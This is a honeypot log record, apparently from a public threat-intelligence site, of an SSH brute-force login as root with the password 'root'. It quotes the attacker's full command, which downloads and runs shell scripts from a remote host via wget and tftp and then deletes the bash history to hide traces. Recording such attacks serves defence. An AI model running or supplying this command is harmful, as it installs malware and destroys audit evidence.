Time | 2024/05/07, 04:38:52 (GMT) |
Transaction ID | EKMA660HF64G8IB3 |
Service | ssh |
Location | DE (Germany) |
Attacker | 2.58.95.80 |
Classification | Web script execution |
Harm Potential | High |
2.58.95.80 client username 'root' and password 'root' entered 2.58.95.80 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.88.90.168/CPU.sh; chmod 777 *; sh CPU.sh; tftp -g 45.88.90.168 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh;cd;history-c;rm -rf .bash_history;cd;rm -rf .bash_history;rm -rf .bash_profile;rm -rf .bash_logout'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |